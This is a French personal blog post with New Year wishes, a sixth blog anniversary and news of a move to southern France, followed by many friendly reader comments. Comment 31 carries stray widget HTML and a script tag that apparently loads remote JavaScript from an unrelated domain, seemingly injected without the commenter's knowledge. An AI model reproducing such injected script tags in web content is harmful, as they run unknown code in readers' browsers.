• Meilleurs voeux...

    J'espère que vous avez bien passé le cap… des fêtes déjà et que vous commencez bien l'année 2020..

    Pour ma part je suis encore bien occupée, je déménage ce mois, j'ai réalisé mon rêve, m'installer dans le sud, ce n'est pas une mince affaire, j'avance, j'y serais le 20 janvier.

    Quelques photos "coup de cœur" de cette année et des années précédentes..

    Mon blog a 6 ans aujourd'hui...

    Quels bons moments de partage.. c'est prenant mais tellement enrichissant..

     

    Meilleurs voeux...

    Un aperçu de mes photos d'antan..  

    Meilleurs voeux...

     

     

    Meilleurs voeux...

    Grenoble ma Ville..

    Meilleurs voeux...

    Nos virées en montagne dans le Vercors..

    Meilleurs voeux...

     

     

    Meilleurs voeux...

     

    Meilleurs voeux...

     

    Meilleurs voeux...

     

    Meilleurs voeux...

     

    Meilleurs voeux...

     

    Meilleurs voeux...

     Le Lac Achard dans le Massif de Belledonne.

    Meilleurs voeux...

     

    Bonne journée à tous..

     

    Meilleurs voeux...

     

    « La CharrelièreAnnée 2019 »

  • Commentaires

    61
    Vendredi 24 Janvier 2020 à 09:39

    bon vendredi ma petite rozy avec le froid encore aujourd'hui

    mais dès dimanche ça remonte, on va vers la douceur ce que je préfère pour mes douleurs.

    en ce moment on en bave maman et moi et nos douleurs..

    bon j'espère que tu vois un peu plus clair dans ton rangement, d'emmenager c'est toujours quelque chose, je vais bientôt connaitre ça !!! kevin part à lille ce w.end il en profite que les peintres ne sont pas encore venus, ensuite il attaquera le séjour, pour que je puisse aménager enfin, peut être qu'au début je serai encore obligée de dormir chez maman, car bon, la salle à manger est pleine, va falloir des bras pour tout remettre dans chaque pièce;  le fils des amis de maman viendra aider et un copain de kevin aussi...

    allez en mars normalement je serai chez moi.. ça aura duré 4 mois le truc.. ensuite ce sera la réfection des escaliers, puis le toit, et ensuite le revêtement extérieur tout autour de l'immeuble, le double pour avoir plus chaud, on espère que ça va le faire car fait pas chaud dans l'appart !!!!

    te souhaite un bon w.end ma rozy, fais un calinou à petite canelle espère qu'elle se plait bien là où tu es maintenant et qu'elle a pris ses marques.

    je t'embrasse bien fort, bibi flo.

    60
    Lundi 20 Janvier 2020 à 19:51

    Bonsoir ,es ce que ton déménagement et ton emménagement  s'est bien passé tu t'en sort  avec tout tes cartons .

    Bisou

    59
    Lundi 13 Janvier 2020 à 15:38

    Très appréciées ces photos!

    58
    Vendredi 10 Janvier 2020 à 16:11

    De bien belles photos. Comme d'habitude.Je ne sais pas où tu vas aller, mais c'est presque dommage que tu quittes l'endroit où tu habites. C'est positivement magnifique. Ce sera mieux ailleurs ? Bises et bonne année, à toi et à tous les tiens. Florentin

    57
    Vendredi 10 Janvier 2020 à 11:40

    coucou rosy,je passe te souhaiter un bon weekend

    en esperant que ton demenagement se passe bien

    gros bisous

    bon weekend

    56
    Vendredi 10 Janvier 2020 à 11:34

    Avec des bisous !

    55
    Vendredi 10 Janvier 2020 à 10:36

    Bonjour Rosy

    Passe une très bonne fin de semaine et bon week-end , dans les cartons j'imagine !

    Gros bisous

    54
    Vendredi 10 Janvier 2020 à 10:08

    Bonjour Rozye!

    Inverse donc ces arrivées de commentaires du + récent au plus ancien car ce n'est pas pratique vue le nombre de se "taper" tous les baratins hihi ....... Bon merci pour ta visite et quoi toi aussi tu commences une nouvelle vie, mais en déménagement, moi c'est avec mon nouvel amoureux... enfin on est pas encore complètement ensemble mais çà ne saurait tarder ... comme quoi à 80 balais on peut encore aimer !!! Bisous à une prochaine fois ! Bonne continuation.

    53
    Vendredi 10 Janvier 2020 à 09:21

    ça avance la date du déménagement ma petite lily, toi aussi tu es dans les cartons lol.. 

    kevin a réintégré l'appart hier soir.. j'ai été le chercher à la gare, il a quitté plus tôt, et a pu installer son lit, son bureau, l'ordi, dans sa chambre, comme ça il est sur place, et il va pouvoir petit à petit attaquer la salle à manger, en faisant un peu tous les soirs, et le w;end.. je lui ai amené des plats que j'avais congelé ici pour lui, car il n'a que le micro ondes pour le moment pour faire réchauffer. 

    je vais chez le dentiste ce matin mais je ne sais pas si elle va pouvoir me faire quelque chose aujourd'hui, car il ne reste plus gd chose de cette dent, juste un morceau et les racines, elle a du s'effriter depuis qu'elle s'est cassée..  

    de toute manière c'est une grosse molaire, qui est bonne à être arrachée, une ancienne couronne dévitalisée , je ne pensais pas qu'on pouvait faire un abcès à une dent qui avait été dévitalisée ??? comme quoi.. 

    bon courage pour tout, petite caresse à cannelle, un gros bizou flo.

    52
    Vendredi 10 Janvier 2020 à 08:53

    Bonjour
    Ce qui ma plu le plus ce sont tes images de neige
    La neige manque en hiver 
    Où sont nos hivers d'antan ?
    Je te souhaite une belle journée et un bon déménagement (je viens de le lire ...)

    51
    Jeudi 9 Janvier 2020 à 10:32

    Bonjour Rosy

    Je passe te faire un petit coucou, et bon courage pour ton déménagement, bisous

    50
    Jeudi 9 Janvier 2020 à 09:41

    Coucou Rosy

    Passe un très bon jeudi

    Gros bisous

    49
    Mercredi 8 Janvier 2020 à 20:09
    6 ans,ce blog,bravo ! Je ne compte plus les années que je bloggue,j ai commencé sur au féminin.com,je crois qu il y a 12 ans ! C est génial de réaliser ses rêves,bravo rosy,un nouveau départ arrive !
    48
    Mercredi 8 Janvier 2020 à 17:05

    Kikou Rozy

    Je suis bien heureux pour toi si tu as réussi à réaliser ton rêve, c'est toujours le souhait de ceux qui veulent être bien.

    Et sans indiscrétion dans quelle ville ou quel village vas tu, promis je n'irai pas t'ennuyer chez toi :)

    Merci pour ces charmantes photos. J'espère que ton blog continuera sa route et t'accompagnera là où tu te rends.

    Je te souhaite une douce journée

    Prends soin de toi

    @lain

    47
    Mercredi 8 Janvier 2020 à 10:55

    ça commence à venir la date du déménagement ma pauvre tu dois en avoir partout .. 

    moi ça stagne énormément, durant noel et jour de l'an, ils devaient bosser et au final avec les grèves tout ça , personne n'est venu ou très peu.. manque de matériaux , d'ouvriers bref c'est le bordel.. et le chef de chantier ne me rappelle plus.. je vais devoir le coincer, mais comment ? je ne peux pas y aller tous les jours non plus ça fait 3 fois que je me casse le nez.. 

    te souhaite bon courage pour les cartons, petite canelle va sentir que vous changer de rue !!! lol.. 

    bientôt dans ta nouvelle maison que j'ai hâte de découvrir aussi.

    je t'embrasse bien fort, caresses à cannelle bibi flo

    46
    Mercredi 8 Janvier 2020 à 08:00

    Bonjour Rozy.

    Bon anniversaire à ton blog.

    Le mien fête ses 10 ans ce mois ci.

    Je te souhaite une bonne journée.

    Bisous de nous deux.

    45
    Mercredi 8 Janvier 2020 à 07:37
    Bonjour Rozy Je te souhaite une bonne année 2020 et tout le bonheur possible dans ta nouvelle vie. C'est beau de réaliser ses rêves ! Quel malheur quand nous avons perdu nos blogs ! Toutes ces archives envolées...Mais nous avons bien rebondi et nous sommes toujours là ! Bises, bises
    44
    Mardi 7 Janvier 2020 à 21:38

    bonsoir ma belle ,bon courage pour le déménagement , c'était gris aujourd'hui et demain retour de la pluie , nous avons démonté le sapin , partira à la déchetterie enfin de semaine , bonne soirée , bisous

    43
    Mardi 7 Janvier 2020 à 15:01

    Coucou Rozy

    Meilleurs voeux à toi aussi !

    bravo et merci pour toutes ces belles photos qui m'ont fait du bien à regarder, il y a tant d'amour, de lumière et de tendresse en chacune d'elles !

    je te souhaite un bon emménagement, je suis vraiment ravie que tu t'installes dans un endroit de tes rêves

    gros bisous

    Am

    42
    Mardi 7 Janvier 2020 à 12:31

    Un nouveau départ pour une nouvelle année que je te souhaite super belle et pleine de soleil puisque tu vas t’installer dans le sud. 

    Un Bon Anniversaire à ton blog, merci de nous montrer tes belles balades, de partager tes découvertes. Puisque tu changes de région je pense que tu vas nous faire voir tout plein de belles choses dès que ton installation sera faite.

    C’est vrai, tenir un blog c’est « presque un travail » lol mais comme tu dis c’est tellement enrichissant.

    Bon déménagement. Biz. Aline

    41
    Mardi 7 Janvier 2020 à 10:36

    Avec des bisous !

    40
    Mardi 7 Janvier 2020 à 10:25

    Coucou la belle

    Passe une excellente journée 

    Gros bisous à jeudi

    39
    Mardi 7 Janvier 2020 à 07:12

    6 ans et des bons souvenirs

    je suppose qu'en changeant de lieu nous aurons le droit à d'autres photos

    bises amicales

    38
    Lundi 6 Janvier 2020 à 16:22

    Bonjour Rozy,

    Bon anniversaire à ton blog et tous mes meilleurs voeux pour cette nouvelle année.
    Ton déménagement approche à grands pas. Je suis certaine que tu auras beaucoup de plaisir dans le Sud. Plus de grisaille ou du gros froid humide mais de la chaleur et le chant de cigales. Vous ne regretterez pas ce changement. Je connais Grenoble et cette ville est très polluée, glaciale en hiver et super chaude en été.

    Il y a 5 ans exactement c'était nous qui quittions la région de Chambéry pour vernir nous installer en Haute Provence. Crois moi, le brouillard ne me manque pas !

    Je te souhaite donc un très bon déménagement et un excellent aménagement. A bientôt des photos de ton nouvel environnement. Bises

    37
    Lundi 6 Janvier 2020 à 16:17

    Coucou

    Bon courage pour les préparatifs et le déménagement

    Bisous

    36
    Lundi 6 Janvier 2020 à 14:09

    Merci pour tes vœux si joliment illustrés par tes photos best off de l'année écoulée.

    Reçois les miens, que je me propose de te souhaiter notés à 20/20.

    Une belle santé, des bonheurs de toutes tailles, joies en famille et entre amis, et beaucoup de bon partages sur nos blogs. Et un souhait spécial 2020, que tout se passe bien dans votre déménagement. Un beau challenge un grand défi.

    Gros bisou d'amitié. Amicalement. Yann

    35
    Lundi 6 Janvier 2020 à 13:37

    coucou rosy!!bonne semaine et courage pour ton demenagement

    gros bisous

    bon debut de semaine

    34
    jm:rober
    Lundi 6 Janvier 2020 à 10:31

    Bonjour Rozy,

    Je vois que cette belle région Grenobloise ne sera plus que un souvenir avec cette expatriation vers le Sud ? Une belle région mais que je trouve bien souvent très mouvementé par les effets climatiques .

    Alors bons vœux pour ses 360 jours restant et bon déménagement  

    Bonne fin de journée

    Amitiés

    33
    Lundi 6 Janvier 2020 à 10:20

    bonjour Rosy , bon anniversaire à ton blog et merci pour tous tes partages !

    ah déménager est un grand changement dans la vie ! alors profitez en au max ...

     et après ce sera que du bonheur !!!  merci pour tes photos enneigées ...

    j'aime +++ tous ces paysages et le beau papillon  waouh 

    gros bisous A+

    32
    Lundi 6 Janvier 2020 à 09:44

    JOYEUX ANNIVERSAIRE A TON BLOG

    mal lily , hé oui c'est top les blogs, merci à celui qui les a inventés !!!

    j'adore ton bandeau, avec le reflet de la boule ...

    sont belles tes photos de neige, montagne, lac, superbe...

    ah comme tu dois être contente de partir dans un mois tu seras chez toi, hâte de découvrir

    ton nouvel univers... bon ça vient hein plus que 15 jrs et hop ! tu changeras de lieu.

    espère que cannelle s'y plaira, mais bon elle a l'habitude de changer de maison.

    un gros bizou ma rozy, et un bon lundi à toi caresses à cannelle bibi flo

    31
    Lundi 6 Janvier 2020 à 09:22

     

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

    un déménagement n'est pas anodin , changer de région  est une décision qui n'est pas facile.
    Mais bon dans la vie ,il faut faire des choix !!Nous regretterons les paysages de la Montagne.Bonne installation .Meilleurs Vœux 2020.Sincères amitiés...Jacques

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script>
    30
    Lundi 6 Janvier 2020 à 08:56

    Jolies photos, bonne continuation à ton blog et bon déménagement dans le sud quelle chance !

    Bonne semaine bisous !

    29
    Lundi 6 Janvier 2020 à 08:28

    Il parait que quand on veut on peut ! Alors bravo pour ce rêve réalisé. J'espère pouvoir en dire autant un jour et pas trop lointain.

    Et puis comme tu ne seras pas trop loin de moi lorsque nous sommes dans nos quartiers d'été je vais voir si c'est possible qu'on fasse une rencontre.

    Bon déménagement ma Rozy

    Gros bisou

    28
    Lundi 6 Janvier 2020 à 08:24
    Coucou Rosy Me voilà de retour après quelques jours de repos, je te souhaite une merveilleuse année 2020 Merci pour le partage. Rohnny
    27
    Lundi 6 Janvier 2020 à 07:51

    Bonjour Rosy

    Tu réalises un rêve pour démarrer l'année 2020 , c'est super beaucoup de bonheur futur chère Rosy!

    Bon courage car c'est beaucoup de travail , mais , quel joie une fois que tu seras installée .

    De superbes clichés enneigés , les paysages sont absolument superbes !

    Je te souhaite une très bonne journée

    Gros bisous

    26
    Lundi 6 Janvier 2020 à 05:09

    Une magnifique rétrospective de quelques unes de tes plus belles photos.

    Bon courage pour ton déménagement : dépaysement garanti mais qui promet de superbes balades à partager.

    Je me régale d'avance.

    Bon début de semaine avec le retour du froid !
    Demain, grand jour du contrôle de ma carcasse et RDV avec le rhumatologue en espérant qu'il ne va pas confirmer le port d'un corset obligatoire ... préconisé par mon ostéopathe de beau-frère.
    Gros bisoux, ma rozy ♥

     

    25
    Dimanche 5 Janvier 2020 à 23:19

    Coucou Rozy,

    belle et heureuse année ... avec de nouveaux projets ... déménagement vers le sud!

    Si c'est ton choix je m'incline ... le mien serait plutôt de m'en éloigner pour trouver des coinx plus frais.

    Tes randos dans la neige me manqueront, mais il y a tant d'autres belles choses à voir.

    J'adore tes deux fenêtres du début.

    Gros bisous.

    PS: je suis toujours très fatiguée.

    24
    Dimanche 5 Janvier 2020 à 21:40

    Bonsoir Rosy

    Tu vas regretter cette belle région malgré tout, mais dans le sud tu auras le beau temps et c'est quand même bien agréable, et puis tu vas faire des découvertes que tu nous feras partager, et je pense que la marche sera moins rude.

    Je te souhaite une bonne soirée, bisous

     

    23
    Dimanche 5 Janvier 2020 à 21:05

    bonsoir ma belle , contente de te retrouver après ces fêtes et la famille repartie , c'est beaucoup de fatigue mais bon , ça fait toujours plaisir de la recevoir et pour eux  , ma porte sera toujours ouverte , merci de tes messages postés sur mon blog , tout d'abord , permets-moi avec un peu de retard de te souhaiter une bonne et heureuse année ainsi qu'une bonne santé et que tous tes voeux se réalisent , bonne soirée , bisous

    22
    Dimanche 5 Janvier 2020 à 20:41
    CathyRose

    Merci Rozy, belle nouvelle année à toi également, ainsi qu'à ceux qui te sont chers ! Merci pour cette petite rétrospective, et bon courage pour le déménagement.
    Belle soirée, bisous !
    Cathy

    21
    Dimanche 5 Janvier 2020 à 17:31

    Bon anniversaire à ton blog 

    Bonne installation dans ta nouvelle vie 

    Bisous 

    Meilleurs voeux pour 2020

    Gros gros bisous 

    En ce 3 janvier 2020 --- il y en a pour tout le monde + ma participation pour Brigitte

    20
    Julia2019
    Dimanche 5 Janvier 2020 à 17:09
    Bonsoir ,6 ans tu es sur ce n'est pas plus ,es ce que tu as compté (au féminin,) Bon déménagement alors n'oublie surtout pas de faire tes changements d'adresse aux principaux comme SS et autre Bisou
    19
    Dimanche 5 Janvier 2020 à 16:44

    Bonjour Rozy

    Ah oui c'est trop beau le Vercors j'adore.

    Je te souhaite une très bonne et très heureuse année 2020, mais surtout une excellente santé pour toi et tous ceux que tu aimes.

    Gros bisous, à très bientôt

    @lain

    18
    Dimanche 5 Janvier 2020 à 14:51

    Bon anniversaire à ton blog Rozy,

    superbes rétrospectives 

    Tous mes vœux de bonheur les plus sincères et bienvenue dans ta nouvelle vie ma chère Amie,

    un rêve devenu réalité !!!

    Bises amicales de Christiane

    17
    Dimanche 5 Janvier 2020 à 14:19

    Coucou Rozy. Je viens te souhaiter une excellente année 2020, que cette année nouvelle te comble de bonheurs de joies et une santé à toute épreuve. Superbe série de partage . Bon courage pour ton déménagement. Gros bisous à bientôt.

    16
    choco
    Dimanche 5 Janvier 2020 à 13:34

    Quelles belles photos encore, et encore !!!
    j'adore !
    je ne sais plus comment te le dire ...
    bonne année Rozy, bonne route pour ta nouvelle vie,
    et bon anniversaire à ton blog

    bisous

    15
    Dimanche 5 Janvier 2020 à 11:26
    Floralie

    Bonjour Rozy,

    Bonne et heureuse année, joyeux anniversaire à ton blog, bon courage pour ton déménagement et tes photos d'Antan sont une pure merveille

    Gros bisous, bon dimanche et à bientôt !

    14
    Dimanche 5 Janvier 2020 à 11:09

    coucou rosy!

    bonne et heureuse annee!!

    on a tout le mois de janvier!lol

    bon courage pour tn demenagement!!dans le sud tu seras bien

    a bientot et gros bisous

    13
    Dimanche 5 Janvier 2020 à 10:57

    Bonne nouvelle année, bon déménagement  dans le sud pour nous faire découvrir des nouveaux lieux, j'attends avec impatience et c'est vrai que le blog c'est prenant mais enrichissant, bise JL

    12
    Dimanche 5 Janvier 2020 à 10:47

    Bonjour Rosy,

    Bonne année à toi aussi , d'autant que tu vas vraiment ouvrir une nouvelle page avec ce déménagement...Je te souhaite la grande forme pour ces jours très occupés !

    Bises .

    11
    Dimanche 5 Janvier 2020 à 10:39

    bonjour Rozy, 

    bon anniversaire à ton blog, c'est fou comme le temps file. 

    Ce n'est pas rien un déménagement et ça fatigue. Bon courage. 

    Passez un bon dimanche, gros bisous

    Nadine

    10
    Dimanche 5 Janvier 2020 à 10:37

    Merci ma Rosy. En retour, reçois mes vœux les plus sincères de bonne et heureuse année, que 2020 t'apporte à toi et à ta famille le meilleur et surtout la santé. De gros bisous d'amitié

    9
    Dimanche 5 Janvier 2020 à 10:35

    Mais tu quittes une belle région aussi.

    Bienvenue dans le Sud que tu y soit heureuse .C'est mon voeu pour 2020 sans oublier les tiens

    Bonne Ephiphanie.

    8
    Dimanche 5 Janvier 2020 à 10:32

    Bonjour Rosy 

    Ravie de te retrouver 

    Quelle chance pour toi de déménager dans le midi , je t'envie c'est mon coin !!

    où vas tu  ? 

    Bon anniversaire à ton blog , merci pour toutes ces balades que tu nous as fait faire à travers tes photos 

    Je te souhaite bon courage pour ton déménagement , je sais que ce n'est pas une mince affaire !

    j'ai tellement déménagé dans ma vie ......... j'espère que quand tu serras bien installée nous te reverrons

    sur les blogs avec des photos de ton nouvel environnement. 

    Je te souhaite également une bonne année  , qu'elle te soit remplit de nouveaux plaisirs et de bonheur 

    Gros bisous ma chère Rosy 

    à bientôt j'espère Hélène

    7
    Dimanche 5 Janvier 2020 à 10:27

    Bon courage pour ton déménagement.

    Tu  continueras a nous mettre de belles photos c'est vers Montpellier que vas il me semble

    A bientôt Bises.

    6
    Dimanche 5 Janvier 2020 à 10:04

    Bonjour Rosy !

    Magnifique page .... que la montagne est belle !

    Bon courage pour ton déménagement .... moi-même j'en ai fait beaucoup, et à chaque fois

    c'est un mois pour le préparer, et un autre pour s'installer

    (sans oublier toute la paperasse liée au déménagement).

    Mais lorsque c'est un choix, c'est super !

     

     

     

    5
    Dimanche 5 Janvier 2020 à 10:00

    Oui reçois tous mes voeux de succès pour ton déménagement et surtout de bonne santé ! . De beaux clichés chez toi et bon Dimanche Rozy , gros bisous , Chris , 

    4
    Dimanche 5 Janvier 2020 à 09:58

    Joiyeux anniblog tout d'abord

    Le depaysement risque d'être bien grand avec ton nouveau chez toi ..mais je ne doute pas que tu nous fasses encore découvrir debien belles choses !

    Donc pour toi cette année va s'ouvrir vers de bien bonnes choses 

    Bises Rozy

     

    3
    Dimanche 5 Janvier 2020 à 09:39

    Dans le sud ? Alors tu te rapproches de chez nous ! Bon ça dépend où aussi, si c'est vers Nice par exemple ça fait une sacrée trotte...

    Bon déménagement et je suis content pour toi, que tu aies réussi à réaliser ton rêve !

    Gros bisous et très bonne 2020

    2
    Dimanche 5 Janvier 2020 à 09:36

    Bonne et heureuse année  ma chère Rosy

    Qu'elle vous apporte joie, bonheur et santé.

    Je souhaite que tu te plaise beaucoup dans ta nouvelle région.

    Bon anniversaire pour ton blog et que celui-ci nous permette toujours de si beaux échanges.

    De belles photos souvenirs.

    Désolée de ne pas avoir donné signe de vie, mais je suis restée presque tout le mois de décembre sans connection.

    De gilets gilets jaunes n'ont rien trouvé de mieux à faire que de faire cramer une armoire de connexion, laissant ainsi plusieurs communes sans internet.

    J'ai enfin été rétablit le 26.

    Bisous ma belle et bon courage pour ton déménagement.

    Aimée

    1
    Dimanche 5 Janvier 2020 à 09:20

    Bon anniversaire à ton blog!

    Merci pour tous tes partages, tu nous éblouis avec tes photos.

    Bon courage pour ton déménagement ...

    Bisous du jour

    Mireille du sablon

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :